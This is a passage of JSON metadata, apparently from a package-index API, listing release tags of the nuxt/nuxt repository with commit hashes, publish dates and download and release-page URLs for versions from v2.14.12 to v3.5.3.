t/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/3.1.1/manifests"},{"name":"v3.1.1","sha":"deb0837c1655b7446befcc8c7df4dedeb3154974","kind":"commit","published_at":"2023-01-25T22:04:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.1/manifests"},{"name":"v3.1.0","sha":"c552d1b420caaac0184fd5c332ebc55b0b0d77ad","kind":"commit","published_at":"2023-01-24T16:47:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.0/manifests"},{"name":"v3.0.0","sha":"d991a55ec36f5ac61de0af7d0b018a150153445b","kind":"commit","published_at":"2022-11-16T14:56:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0/manifests"},{"name":"v3.0.0-rc.14","sha":"0faeb3b5a33203d543de32bf1b9a40b394b979ab","kind":"commit","published_at":"2022-11-16T02:38:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.14","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.14","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.14/manifests"},{"name":"v3.0.0-rc.13","sha":"bde96947333501c22a5e981515bd27c24eb8b88f","kind":"commit","published_at":"2022-11-04T11:37:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.13","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.13","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.13/manifests"},{"name":"v3.0.0-rc.12","sha":"09e553467e970a3bbd092698640c96ddf86d596b","kind":"commit","published_at":"2022-10-18T18:47:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.12/manifests"},{"name":"v3.0.0-rc.11","sha":"6309d223bb247764e32e90d196aca5fd4b913805","kind":"commit","published_at":"2022-09-20T16:38:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.11/manifests"},{"name":"v3.0.0-rc.10","sha":"94377b190180922c8156f6753512362392b3552d","kind":"commit","published_at":"2022-09-14T16:27:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.10/manifests"},{"name":"v3.0.0-rc.9","sha":"9caa9ca31fca90a775d316bfc68ac98952d82942","kind":"commit","published_at":"2022-09-03T10:36:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.9/manifests"},{"name":"v3.0.0-rc.8","sha":"3960f513c377e1ef5d47986a13c1c66c1eaa1afc","kind":"commit","published_at":"2022-08-12T13:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.8/manifests"},{"name":"v3.0.0-rc.7","sha":"5ea0474225c3591cd743f51a72aa2cd7597ec0e4","kind":"commit","published_at":"2022-08-11T10:40:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.7/manifests"},{"name":"v3.0.0-rc.6","sha":"88f4525a4fa7dc1595e85b0cfffdd441aa6970ed","kind":"commit","published_at":"2022-07-18T10:06:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.6/manifests"},{"name":"v3.0.0-rc.5","sha":"65e6b1439e14a196d8b15db51939c65d934532e7","kind":"commit","published_at":"2022-07-13T15:40:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.5/manifests"},{"name":"v3.0.0-rc.4","sha":"be0e502a05a9c8bb2eeaa62459d611f6363be89f","kind":"commit","published_at":"2022-06-13T14:27:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.4/manifests"},{"name":"v3.0.0-rc.3","sha":"36512d0eaaa32e0dd1d0887098fcf842a7fa66b1","kind":"commit","published_at":"2022-05-10T08:58:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.3/manifests"},{"name":"v3.0.0-rc.2","sha":"a8d42d586f84b7cef66c7bf8b76eb560139e6f88","kind":"commit","published_at":"2022-05-02T20:47:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.2/manifests"},{"name":"v3.0.0-rc.1","sha":"0c2f07695702df33a63b88322d93d6815a227a0f","kind":"commit","published_at":"2022-04-20T21:09:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.0.0-rc.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.0.0-rc.1/manifests"},{"name":"v2.15.8","sha":"d4b9e4b0553bcd617ecbc0b8b76871070b347fcb","kind":"tag","published_at":"2021-08-11T21:10:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.8/manifests"},{"name":"v2.15.7","sha":"4f370e2043b7731db0e8ef65a4f88431cd8795f3","kind":"tag","published_at":"2021-06-14T13:59:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.7/manifests"},{"name":"v2.15.6","sha":"0eae970e74f1fbf29f400a3178f54061a79bfac2","kind":"tag","published_at":"2021-05-12T10:47:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.6/manifests"},{"name":"v2.15.5","sha":"0460a278ab5258f0cd6d3fe8fc014f892b2bdaf6","kind":"tag","published_at":"2021-05-09T08:17:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.5/manifests"},{"name":"v2.15.4","sha":"b39dcda6adf21e4eb82caef7895440755c6d96fc","kind":"tag","published_at":"2021-04-01T11:23:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.4/manifests"},{"name":"v2.15.3","sha":"24a0c7e27123874f9545c46852b2e7d34920b017","kind":"tag","published_at":"2021-03-10T12:25:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.3/manifests"},{"name":"v2.15.2","sha":"b7f9cdc2a44dbf25b1bd1845fdc8ebb65b0f0754","kind":"tag","published_at":"2021-02-23T09:20:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.2/manifests"},{"name":"v2.15.1","sha":"95daddf43c3b9e9474870631727755ecd2e94319","kind":"tag","published_at":"2021-02-19T16:39:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.1/manifests"},{"name":"v2.15.0","sha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/